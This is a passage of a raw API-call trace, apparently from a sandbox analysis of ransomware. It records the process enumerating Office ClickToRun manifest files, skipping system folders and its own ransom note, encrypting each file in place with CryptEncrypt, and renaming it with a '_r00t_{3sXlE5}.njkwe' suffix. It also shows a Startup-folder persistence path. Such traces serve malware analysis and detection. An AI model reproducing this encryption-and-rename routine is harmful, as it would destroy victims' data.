"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.610] GetProcessHeap () returned 0xbe0000 [0070.610] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.610] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b87bb60, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x7446, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cAlternateFileName="C2E87B~1.XML")) returned 1 [0070.610] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.610] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.610] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.610] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.610] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.610] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml") returned 131 [0070.610] StrStrIW (lpFirst="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.610] lstrcmpW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.610] lstrcmpW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.610] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.611] GetTickCount () returned 0x1152065 [0070.611] GetTickCount () returned 0x1152065 [0070.611] GetTickCount () returned 0x1152065 [0070.611] GetTickCount () returned 0x1152065 [0070.611] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.611] GetProcessHeap () returned 0xbe0000 [0070.611] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.611] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.613] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.613] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.613] GetProcessHeap () returned 0xbe0000 [0070.613] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.613] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.613] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.613] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.614] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.614] CloseHandle (hObject=0x434) returned 1 [0070.616] GetProcessHeap () returned 0xbe0000 [0070.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.616] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 151 [0070.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.617] GetProcessHeap () returned 0xbe0000 [0070.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.617] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b87bb60, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2d20ad, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x809e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.projectmui.msi.16.en-us.xml", cAlternateFileName="C26005~1.XML")) returned 1 [0070.617] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.617] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.617] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.617] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.617] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.617] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml") returned 118 [0070.617] StrStrIW (lpFirst="C2RManifest.projectmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.617] lstrcmpW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.617] lstrcmpW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.617] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.617] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.617] GetTickCount () returned 0x1152065 [0070.617] GetTickCount () returned 0x1152065 [0070.617] GetTickCount () returned 0x1152065 [0070.617] GetTickCount () returned 0x1152065 [0070.617] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.617] GetProcessHeap () returned 0xbe0000 [0070.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.617] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.664] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.664] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.664] GetProcessHeap () returned 0xbe0000 [0070.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.664] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.665] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0071.288] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0071.693] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0071.693] CloseHandle (hObject=0x434) returned 1 [0071.693] GetProcessHeap () returned 0xbe0000 [0071.693] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0071.693] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 138 [0071.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0071.695] GetProcessHeap () returned 0xbe0000 [0071.695] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0071.695] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed08dd97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed08dd97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd397382c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x63ae, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml", cAlternateFileName="C2B3EB~1.XML")) returned 1 [0071.695] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="Windows") returned -1 [0071.695] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0071.695] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0071.695] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0071.695] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0071.695] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned 121 [0071.695] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0071.695] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0071.695] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="taridd") returned -1 [0071.695] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.ms", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0071.695] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0071.696] GetTickCount () returned 0x115249b [0071.696] GetTickCount () returned 0x115249b [0071.696] GetTickCount () returned 0x115249b [0071.696] GetTickCount () returned 0x115249b [0071.696] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0071.696] GetProcessHeap () returned 0xbe0000 [0071.696] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0071.696] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0071.718] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.718] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0071.718] GetProcessHeap () returned 0xbe0000 [0071.718] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0071.718] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.718] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0071.728] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0071.728] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0071.729] CloseHandle (hObject=0x434) returned 1 [0071.729] GetProcessHeap () returned 0xbe0000 [0071.729] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0071.729] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 141 [0071.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0071.729] GetProcessHeap () returned 0xbe0000 [0071.730] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0071.730] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed08dd97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed08dd97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37a9bb2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fee, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml", cAlternateFileName="C23127~1.XML")) returned 1 [0071.730] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="Windows") returned -1 [0071.730] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="$Recycle.bin") returned 1 [0071.730] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="System Volume Information") returned -1 [0071.730] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="Program Files") returned -1 [0071.730] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="Program Files (x86)") returned -1 [0071.730] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned 121 [0071.730] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpSrch=".njkwe") returned 0x0 [0071.730] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0071.730] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="taridd") returned -1 [0071.730] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.ms", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0071.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0071.731] GetTickCount () returned 0x11524ca [0071.731] GetTickCount () returned 0x11524ca [0071.731] GetTickCount () returned 0x11524ca [0071.731] GetTickCount () returned 0x11524ca [0071.731] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0071.731] GetProcessHeap () returned 0xbe0000 [0071.731] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0071.731] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0071.742] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.742] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0071.743] GetProcessHeap () returned 0xbe0000 [0071.743] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0071.743] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.743] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0071.754] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0071.754] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0071.754] CloseHandle (hObject=0x434) returned 1 [0071.754] GetProcessHeap () returned 0xbe0000 [0071.754] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0071.754] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml_r00t_{3sXlE5}.njkwe") returned 141 [0071.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml_r00t_{3sxle5}.njkwe")) returned 1 [0071.755] GetProcessHeap () returned 0xbe0000 [0071.755] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0071.755] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed067a9a, 